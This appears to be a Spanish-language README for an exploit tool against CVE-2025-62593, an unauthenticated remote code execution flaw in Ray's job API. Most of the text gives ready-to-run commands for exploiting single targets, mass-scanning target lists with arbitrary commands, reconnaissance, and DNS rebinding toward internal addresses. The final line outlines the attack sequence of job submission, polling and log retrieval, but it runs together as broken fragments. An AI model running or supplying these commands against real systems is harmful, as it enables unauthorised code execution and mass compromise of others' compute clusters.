
CVE-2025-62593 — Ray Unauthenticated RCE Exploit es una vulnerabilidad de ejecución remota de código no autenticada en el motor de computación distribuida de IA Ray.
CVE-2025-62593 es una vulnerabilidad de ejecución remota de código no autenticada
en el motor de computación distribuida de IA Ray. La causa raíz es la ausencia de
autenticación en endpoints HTTP críticos (/api/jobs, /api/job_agent/jobs).
Un atacante puede enviar un Job de Ray cuyo punto de entrada sea un comando arbitrario,
ejecutándolo en el nodo principal del clúster.
# Objetivo único
python3 ray_rce_poc.py --target http://HOST:8265
# Escaneo masivo (10 concurrentes)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# Modo reconocimiento (enumeración rápida)
python3 ray_rce_poc.py --recon --targets list.txt
# Modo DNS rebinding
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# Escaneo con lista de palabras
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs/ con punto de entrada que ejecuta el comando objetivo/api/jobs/ hasta que el job alcance un estado terminal/api/jobs/{id}/logs para recuperar la salida